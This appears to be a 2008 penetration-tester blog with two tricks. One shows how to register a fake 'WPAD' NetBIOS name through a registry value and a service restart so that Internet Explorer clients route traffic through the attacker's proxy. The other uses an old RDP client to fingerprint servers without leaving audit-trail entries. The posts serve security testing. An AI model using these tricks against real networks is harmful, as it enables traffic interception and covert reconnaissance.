Wednesday, February 20, 2008

Pentester trick #2: faking NetBIOS names

Trick #2: faking NetBIOS names

There has been a buzz at BlackHat US 2007 around H.D.Moore+Valsmith attack against Internet Explorer autoconfiguration feature.

To sum up, if anything is named after "WPAD" on the network, it will be considered as the enterprise Web proxy by Internet Explorer.

The original attack is based on the "Dynamic DNS Update" feature of Windows DNS servers. DNS updates can be:
  • DNS-based, unauthenticated. Game over.
  • DNS-based, authenticated. Nice try, but since any domain user can create up to 10 computer accounts in Active Directory, it is quite easy to name a computer "WPAD", join a domain and authenticate.
  • DHCP-based. Game over, too: the DNS server will blindly trust your host name.
Ok, but what if "Dynamic DNS Update" feature has been disabled? Or if you need to quickly register names? Joining a new computer to the domain is not an option in this case.

Fortunately, everybody who has sniffed a Windows network for more than 5 minutes knows that most Windows clients "in the wild" use misconfigured name resolution: they rely on NBNS (NetBIOS Name Service) as a fallback.

So how could you take advantage of a broadcasted NBNS request for "WPAD" (or anything else) to redirect target's traffic?

One solution would be to use FakeNetBIOS tools, but they rely on raw sockets, which are broken on Windows XP SP2. Another would be to use Scapy as a NBNS responder, but Windows port is not mature yet :)

As usual, the best solution is to rely on Windows built-in mechanisms to solve the puzzle.

Under HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters, there is a value of type REG_MULTI_SZ called OptionalNames.

Any name put in there will be claimed by the local computer during NBNS name resolution. Then:

net stop lanmanserver
net start lanmanserver

Job done!

Pentester trick #1: using RDP Client 5 on Vista

Nonop's recent post on pentester's essentials was inspiring enough for me to get back on-line, on this long-abandoned blog.

So here is the first post of a (hopefully long) series about pentester tricks, from my very own field experience. Enjoy!

Trick #1 : using RDP Client 5 on Vista

RDP Client 5 has a great advantage over RDP Client 6 : it allows connecting to the remote target without giving any credential ; thus the pentester can get access to server version, computer name and trusted domains, without leaving any track in the security audit trail.

However RDP Client 6 has been pushed on Windows Update quite a while ago, and is required in some cases (like Windows Vista/2008 Remote Desktop with full security options ... which are recommended given flaws found in previous versions of RDP protocol).

Fortunately, it is quite easy to make both clients living together. RDP Client 5 consists of only 2 binaries : MSTSC.EXE and MSTSCAX.DLL. The trick is to copy both files, and to create a MSTSC.EXE.LOCAL file in the same directory. This will force MSTSC.EXE to load libraries from the current directory instead of the global system directory.

References: [1] [2]